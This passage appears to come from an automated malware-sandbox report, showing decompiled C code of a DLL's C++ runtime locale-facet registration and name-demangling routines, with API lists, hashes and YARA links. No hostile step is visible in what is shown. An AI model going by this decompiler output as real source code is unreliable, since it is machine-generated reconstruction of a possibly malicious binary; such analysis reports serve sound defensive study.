																			E6E1E00AC(0x6e2283cf, _t234, _t311, _t319, 0x14);
																			E6E1C6653(_t330 - 0x14, 0);
																			_t320 =  *0x6e286e00; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6E1A161C(0x6e286dac);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6E1C66BA(_t330 - 0x14);
																				return E6E1E0075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6E1D15C4(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t330 - 0x20);
																						E6E1E3D74(_t330 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t234, _t312, _t320, 0x14);
																						E6E1C6653(_t330 - 0x14, 0);
																						_t321 =  *0x6e286dd0; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6E1A161C(0x6e286d60);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6E1C66BA(_t330 - 0x14);
																							return E6E1E0075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6E1D162A(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6E1A1438(_t283);
																									E6E1E3D74(_t330 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e22851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6e22c0c4;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6E1D542F(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6E1E0075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6E1C6FD3(__eflags, _t313);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6e286dd0 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6E1C6FD3(__eflags, _t312);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6e286e00 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6E1C6FD3(__eflags, _t311);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6e286dcc = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6E1C6FD3(__eflags, _t310);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6e286dfc = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6E1C6FD3(__eflags, _t309);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6e286de0 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6E1C6FD3(__eflags, _t308);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6e286ddc = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6E1C6FD3(__eflags, _t307);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6e286db0 = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF8AC
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF8B6
int.LIBCPMT ref: 6E1CF8CD

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF907
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF927
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF945

Strings

dm(n, xrefs: 6E1CF8C1

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: dm(n
API String ID: 651022567-576193998
Opcode ID: 661331adba2d5a379ec6af93e185d29bf912396a4a8b2f9ed8862b8fe3f434c8
Instruction ID: 2d31d974f9024413aea7b2dc93d21ea6cd48075df04141dc2f3f58cfbfe5e24a
Opcode Fuzzy Hash: 661331adba2d5a379ec6af93e185d29bf912396a4a8b2f9ed8862b8fe3f434c8
Instruction Fuzzy Hash: F5113AB59105199BCF01DBE4C854AFEB3BAAF64B14F240408E120E7290CF789985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF4C1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF4C1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t195;
				signed int _t196;
				void* _t208;
				void* _t221;
				void* _t234;
				void* _t247;
				void* _t260;
				void* _t273;
				void* _t286;
				void* _t299;
				void* _t312;
				void* _t325;
				void* _t338;
				void* _t351;
				signed int _t511;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				signed int _t576;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				void* _t594;

				_t551 = __edx;
				_t420 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t594 - 0x14, 0);
				_t567 =  *0x6e286dc0; // 0x0
				 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
				 *(_t594 - 0x10) = _t567;
				_t195 = E6E1A161C(0x6e286d74);
				_t423 =  *((intOrPtr*)(_t594 + 8));
				_t196 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t195);
				_t553 = _t196;
				if(_t196 != 0) {
					L5:
					E6E1C66BA(_t594 - 0x14);
					return E6E1E0075(_t553);
				} else {
					if(_t567 == 0) {
						_push( *((intOrPtr*)(_t594 + 8)));
						_push(_t594 - 0x10);
						__eflags = E6E1D10BF(__ebx, _t423, __edx, _t553, _t567) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t594 - 0x20);
							E6E1E3D74(_t594 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t553, _t567, 0x14);
							E6E1C6653(_t594 - 0x14, 0);
							_t568 =  *0x6e286df8; // 0x0
							 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
							 *(_t594 - 0x10) = _t568;
							_t208 = E6E1A161C(0x6e286da4);
							_t430 =  *((intOrPtr*)(_t594 + 8));
							_t554 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t208);
							__eflags = _t554;
							if(_t554 != 0) {
								L12:
								E6E1C66BA(_t594 - 0x14);
								return E6E1E0075(_t554);
							} else {
								__eflags = _t568;
								if(_t568 == 0) {
									_push( *((intOrPtr*)(_t594 + 8)));
									_push(_t594 - 0x10);
									__eflags = E6E1D1127(_t420, _t430, __edx, _t554, _t568) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t594 - 0x20);
										E6E1E3D74(_t594 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t420, _t554, _t568, 0x14);
										E6E1C6653(_t594 - 0x14, 0);
										_t569 =  *0x6e286df4; // 0x0
										 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
										 *(_t594 - 0x10) = _t569;
										_t221 = E6E1A161C(0x6e286da0);
										_t437 =  *((intOrPtr*)(_t594 + 8));
										_t555 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t221);
										__eflags = _t555;
										if(_t555 != 0) {
											L19:
											E6E1C66BA(_t594 - 0x14);
											return E6E1E0075(_t555);
										} else {
											__eflags = _t569;
											if(_t569 == 0) {
												_push( *((intOrPtr*)(_t594 + 8)));
												_push(_t594 - 0x10);
												__eflags = E6E1D11AB(_t420, _t437, __edx, _t555, _t569) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t594 - 0x20);
													E6E1E3D74(_t594 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t420, _t555, _t569, 0x14);
													E6E1C6653(_t594 - 0x14, 0);
													_t570 =  *0x6e286dc8; // 0x0
													 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
													 *(_t594 - 0x10) = _t570;
													_t234 = E6E1A161C(0x6e286d7c);
													_t444 =  *((intOrPtr*)(_t594 + 8));
													_t556 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t234);
													__eflags = _t556;
													if(_t556 != 0) {
														L26:
														E6E1C66BA(_t594 - 0x14);
														return E6E1E0075(_t556);
													} else {
														__eflags = _t570;
														if(_t570 == 0) {
															_push( *((intOrPtr*)(_t594 + 8)));
															_push(_t594 - 0x10);
															__eflags = E6E1D1230(_t420, _t444, _t551, _t556, _t570) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t594 - 0x20);
																E6E1E3D74(_t594 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t420, _t556, _t570, 0x14);
																E6E1C6653(_t594 - 0x14, 0);
																_t571 =  *0x6e286dc4; // 0x0
																 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																 *(_t594 - 0x10) = _t571;
																_t247 = E6E1A161C(0x6e286d78);
																_t451 =  *((intOrPtr*)(_t594 + 8));
																_t557 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t247);
																__eflags = _t557;
																if(_t557 != 0) {
																	L33:
																	E6E1C66BA(_t594 - 0x14);
																	return E6E1E0075(_t557);
																} else {
																	__eflags = _t571;
																	if(_t571 == 0) {
																		_push( *((intOrPtr*)(_t594 + 8)));
																		_push(_t594 - 0x10);
																		__eflags = E6E1D12B4(_t420, _t451, _t551, _t557, _t571) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t594 - 0x20);
																			E6E1E3D74(_t594 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t420, _t557, _t571, 0x14);
																			E6E1C6653(_t594 - 0x14, 0);
																			_t572 =  *0x6e286dd8; // 0x0
																			 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																			 *(_t594 - 0x10) = _t572;
																			_t260 = E6E1A161C(0x6e286d84);
																			_t458 =  *((intOrPtr*)(_t594 + 8));
																			_t558 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t260);
																			__eflags = _t558;
																			if(_t558 != 0) {
																				L40:
																				E6E1C66BA(_t594 - 0x14);
																				return E6E1E0075(_t558);
																			} else {
																				__eflags = _t572;
																				if(_t572 == 0) {
																					_push( *((intOrPtr*)(_t594 + 8)));
																					_push(_t594 - 0x10);
																					__eflags = E6E1D1339(_t420, _t458, _t551, _t558, _t572) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t594 - 0x20);
																						E6E1E3D74(_t594 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t420, _t558, _t572, 0x14);
																						E6E1C6653(_t594 - 0x14, 0);
																						_t573 =  *0x6e286db0; // 0x0
																						 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																						 *(_t594 - 0x10) = _t573;
																						_t273 = E6E1A161C(0x6e286d64);
																						_t465 =  *((intOrPtr*)(_t594 + 8));
																						_t559 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t273);
																						__eflags = _t559;
																						if(_t559 != 0) {
																							L47:
																							E6E1C66BA(_t594 - 0x14);
																							return E6E1E0075(_t559);
																						} else {
																							__eflags = _t573;
																							if(_t573 == 0) {
																								_push( *((intOrPtr*)(_t594 + 8)));
																								_push(_t594 - 0x10);
																								__eflags = E6E1D13A1(_t420, _t465, _t551, _t559, _t573) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t594 - 0x20);
																									E6E1E3D74(_t594 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t420, _t559, _t573, 0x14);
																									E6E1C6653(_t594 - 0x14, 0);
																									_t574 =  *0x6e286ddc; // 0x0
																									 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																									 *(_t594 - 0x10) = _t574;
																									_t286 = E6E1A161C(0x6e286d88);
																									_t472 =  *((intOrPtr*)(_t594 + 8));
																									_t560 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t286);
																									__eflags = _t560;
																									if(_t560 != 0) {
																										L54:
																										E6E1C66BA(_t594 - 0x14);
																										return E6E1E0075(_t560);
																									} else {
																										__eflags = _t574;
																										if(_t574 == 0) {
																											_push( *((intOrPtr*)(_t594 + 8)));
																											_push(_t594 - 0x10);
																											__eflags = E6E1D1409(_t420, _t472, _t551, _t560, _t574) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t594 - 0x20);
																												E6E1E3D74(_t594 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t420, _t560, _t574, 0x14);
																												E6E1C6653(_t594 - 0x14, 0);
																												_t575 =  *0x6e286de0; // 0x0
																												 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																												 *(_t594 - 0x10) = _t575;
																												_t299 = E6E1A161C(0x6e286d8c);
																												_t479 =  *((intOrPtr*)(_t594 + 8));
																												_t561 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t299);
																												__eflags = _t561;
																												if(_t561 != 0) {
																													L61:
																													E6E1C66BA(_t594 - 0x14);
																													return E6E1E0075(_t561);
																												} else {
																													__eflags = _t575;
																													if(_t575 == 0) {
																														_push( *((intOrPtr*)(_t594 + 8)));
																														_push(_t594 - 0x10);
																														__eflags = E6E1D1471(_t420, _t479, _t551, _t561, _t575) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t594 - 0x20);
																															E6E1E3D74(_t594 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t420, _t561, _t575, 0x14);
																															E6E1C6653(_t594 - 0x14, 0);
																															_t576 =  *0x6e286dfc; // 0x0
																															 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																															 *(_t594 - 0x10) = _t576;
																															_t312 = E6E1A161C(0x6e286da8);
																															_t486 =  *((intOrPtr*)(_t594 + 8));
																															_t562 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t312);
																															__eflags = _t562;
																															if(_t562 != 0) {
																																L68:
																																E6E1C66BA(_t594 - 0x14);
																																return E6E1E0075(_t562);
																															} else {
																																__eflags = _t576;
																																if(_t576 == 0) {
																																	_push( *((intOrPtr*)(_t594 + 8)));
																																	_push(_t594 - 0x10);
																																	__eflags = E6E1D14EC(_t420, _t486, _t551, _t562, _t576) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t594 - 0x20);
																																		E6E1E3D74(_t594 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t420, _t562, _t576, 0x14);
																																		E6E1C6653(_t594 - 0x14, 0);
																																		_t577 =  *0x6e286dcc; // 0x0
																																		 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																		 *(_t594 - 0x10) = _t577;
																																		_t325 = E6E1A161C(0x6e286d80);
																																		_t493 =  *((intOrPtr*)(_t594 + 8));
																																		_t563 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t325);
																																		__eflags = _t563;
																																		if(_t563 != 0) {
																																			L75:
																																			E6E1C66BA(_t594 - 0x14);
																																			return E6E1E0075(_t563);
																																		} else {
																																			__eflags = _t577;
																																			if(_t577 == 0) {
																																				_push( *((intOrPtr*)(_t594 + 8)));
																																				_push(_t594 - 0x10);
																																				__eflags = E6E1D1558(_t420, _t493, _t551, _t563, _t577) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t594 - 0x20);
																																					E6E1E3D74(_t594 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t420, _t563, _t577, 0x14);
																																					E6E1C6653(_t594 - 0x14, 0);
																																					_t578 =  *0x6e286e00; // 0x0
																																					 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																					 *(_t594 - 0x10) = _t578;
																																					_t338 = E6E1A161C(0x6e286dac);
																																					_t500 =  *((intOrPtr*)(_t594 + 8));
																																					_t564 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t338);
																																					__eflags = _t564;
																																					if(_t564 != 0) {
																																						L82:
																																						E6E1C66BA(_t594 - 0x14);
																																						return E6E1E0075(_t564);
																																					} else {
																																						__eflags = _t578;
																																						if(_t578 == 0) {
																																							_push( *((intOrPtr*)(_t594 + 8)));
																																							_push(_t594 - 0x10);
																																							__eflags = E6E1D15C4(_t420, _t500, _t551, _t564, _t578) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t594 - 0x20);
																																								E6E1E3D74(_t594 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t420, _t564, _t578, 0x14);
																																								E6E1C6653(_t594 - 0x14, 0);
																																								_t579 =  *0x6e286dd0; // 0x0
																																								 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																								 *(_t594 - 0x10) = _t579;
																																								_t351 = E6E1A161C(0x6e286d60);
																																								_t507 =  *((intOrPtr*)(_t594 + 8));
																																								_t565 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t351);
																																								__eflags = _t565;
																																								if(_t565 != 0) {
																																									L89:
																																									E6E1C66BA(_t594 - 0x14);
																																									return E6E1E0075(_t565);
																																								} else {
																																									__eflags = _t579;
																																									if(_t579 == 0) {
																																										_push( *((intOrPtr*)(_t594 + 8)));
																																										_push(_t594 - 0x10);
																																										__eflags = E6E1D162A(_t420, _t507, _t551, _t565, _t579) - 0xffffffff;
																																										if(__eflags == 0) {
																																											_t511 = _t594 - 0x20;
																																											E6E1A1438(_t511);
																																											E6E1E3D74(_t594 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e22851f, _t420, _t565, _t579, 4);
																																											_t580 = _t511;
																																											 *(_t594 - 0x10) = _t580;
																																											 *((intOrPtr*)(_t580 + 4)) =  *((intOrPtr*)(_t594 + 0xc));
																																											_push( *((intOrPtr*)(_t594 + 0x14)));
																																											_t189 = _t594 - 4;
																																											 *_t189 =  *(_t594 - 4) & 0x00000000;
																																											__eflags =  *_t189;
																																											 *_t580 = 0x6e22c0c4;
																																											 *((char*)(_t580 + 0x28)) =  *((intOrPtr*)(_t594 + 0x10));
																																											E6E1D542F(_t420, _t511, _t551, _t565, _t580,  *_t189);
																																											return E6E1E0075(_t580,  *((intOrPtr*)(_t594 + 8)));
																																										} else {
																																											_t565 =  *(_t594 - 0x10);
																																											 *(_t594 - 0x10) = _t565;
																																											 *(_t594 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t565);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t565 + 4))))();
																																											 *0x6e286dd0 = _t565;
																																											goto L89;
																																										}
																																									} else {
																																										_t565 = _t579;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t564 =  *(_t594 - 0x10);
																																								 *(_t594 - 0x10) = _t564;
																																								 *(_t594 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t564);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t564 + 4))))();
																																								 *0x6e286e00 = _t564;
																																								goto L82;
																																							}
																																						} else {
																																							_t564 = _t578;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t563 =  *(_t594 - 0x10);
																																					 *(_t594 - 0x10) = _t563;
																																					 *(_t594 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t563);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t563 + 4))))();
																																					 *0x6e286dcc = _t563;
																																					goto L75;
																																				}
																																			} else {
																																				_t563 = _t577;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t562 =  *(_t594 - 0x10);
																																		 *(_t594 - 0x10) = _t562;
																																		 *(_t594 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t562);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t562 + 4))))();
																																		 *0x6e286dfc = _t562;
																																		goto L68;
																																	}
																																} else {
																																	_t562 = _t576;
																																	goto L68;
																																}
																															}
																														} else {
																															_t561 =  *(_t594 - 0x10);
																															 *(_t594 - 0x10) = _t561;
																															 *(_t594 - 4) = 1;
																															E6E1C6FD3(__eflags, _t561);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t561 + 4))))();
																															 *0x6e286de0 = _t561;
																															goto L61;
																														}
																													} else {
																														_t561 = _t575;
																														goto L61;
																													}
																												}
																											} else {
																												_t560 =  *(_t594 - 0x10);
																												 *(_t594 - 0x10) = _t560;
																												 *(_t594 - 4) = 1;
																												E6E1C6FD3(__eflags, _t560);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t560 + 4))))();
																												 *0x6e286ddc = _t560;
																												goto L54;
																											}
																										} else {
																											_t560 = _t574;
																											goto L54;
																										}
																									}
																								} else {
																									_t559 =  *(_t594 - 0x10);
																									 *(_t594 - 0x10) = _t559;
																									 *(_t594 - 4) = 1;
																									E6E1C6FD3(__eflags, _t559);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t559 + 4))))();
																									 *0x6e286db0 = _t559;
																									goto L47;
																								}
																							} else {
																								_t559 = _t573;
																								goto L47;
																							}
																						}
																					} else {
																						_t558 =  *(_t594 - 0x10);
																						 *(_t594 - 0x10) = _t558;
																						 *(_t594 - 4) = 1;
																						E6E1C6FD3(__eflags, _t558);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t558 + 4))))();
																						 *0x6e286dd8 = _t558;
																						goto L40;
																					}
																				} else {
																					_t558 = _t572;
																					goto L40;
																				}
																			}
																		} else {
																			_t557 =  *(_t594 - 0x10);
																			 *(_t594 - 0x10) = _t557;
																			 *(_t594 - 4) = 1;
																			E6E1C6FD3(__eflags, _t557);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t557 + 4))))();
																			 *0x6e286dc4 = _t557;
																			goto L33;
																		}
																	} else {
																		_t557 = _t571;
																		goto L33;
																	}
																}
															} else {
																_t556 =  *(_t594 - 0x10);
																 *(_t594 - 0x10) = _t556;
																 *(_t594 - 4) = 1;
																E6E1C6FD3(__eflags, _t556);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t556 + 4))))();
																 *0x6e286dc8 = _t556;
																goto L26;
															}
														} else {
															_t556 = _t570;
															goto L26;
														}
													}
												} else {
													_t555 =  *(_t594 - 0x10);
													 *(_t594 - 0x10) = _t555;
													 *(_t594 - 4) = 1;
													E6E1C6FD3(__eflags, _t555);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t555 + 4))))();
													 *0x6e286df4 = _t555;
													goto L19;
												}
											} else {
												_t555 = _t569;
												goto L19;
											}
										}
									} else {
										_t554 =  *(_t594 - 0x10);
										 *(_t594 - 0x10) = _t554;
										 *(_t594 - 4) = 1;
										E6E1C6FD3(__eflags, _t554);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t554 + 4))))();
										 *0x6e286df8 = _t554;
										goto L12;
									}
								} else {
									_t554 = _t568;
									goto L12;
								}
							}
						} else {
							_t553 =  *(_t594 - 0x10);
							 *(_t594 - 0x10) = _t553;
							 *(_t594 - 4) = 1;
							E6E1C6FD3(__eflags, _t553);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t553 + 4))))();
							 *0x6e286dc0 = _t553;
							goto L5;
						}
					} else {
						_t553 = _t567;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF4C8
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF4D2
int.LIBCPMT ref: 6E1CF4E9

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF523
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF543
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF561

Strings

tm(n, xrefs: 6E1CF4DD

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: tm(n
API String ID: 651022567-1916883537
Opcode ID: 9be10ebee0f8dd41ef4f34f27206de808e436bb0462bf580a731567ab719fd56
Instruction ID: a623e47812fada3c68ea31d63167a888b1411e1e5eb347ca1a416cca47a24bb8
Opcode Fuzzy Hash: 9be10ebee0f8dd41ef4f34f27206de808e436bb0462bf580a731567ab719fd56
Instruction Fuzzy Hash: 0F110AB591051D8BCF01EFD4C854AFEB77ABF64B14F240908D520E7290DF789988E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E735D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1E735D(void* __eflags, signed int* _a4) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				intOrPtr _t17;
				intOrPtr* _t20;
				void* _t22;
				void* _t25;
				signed int* _t30;
				intOrPtr* _t33;
				void* _t42;

				E6E1E5A6C( &_v12, E6E1E614D(0));
				_t33 =  *0x6e287218; // 0x0
				_t17 =  *_t33;
				if(_t17 == 0) {
					E6E1E6052( &_v12, 1);
					goto L8;
				} else {
					 *0x6e287218 = _t33 + 1;
					_t22 = _t17 - 0x30;
					if(_t22 == 0) {
						E6E1E5FF1( &_v12, "void");
						goto L8;
					} else {
						_t25 = _t22;
						if(_t25 == 0) {
							E6E1E5EFB( &_v12, L6E1E9DB3(_t42, __eflags,  &_v20));
							goto L8;
						} else {
							if(_t25 != 3) {
								L8:
								E6E1E5FF1( &_v12, ") ");
								_t20 = _a4;
								 *_t20 = _v12;
								 *((intOrPtr*)(_t20 + 4)) = _v8;
								return _t20;
							} else {
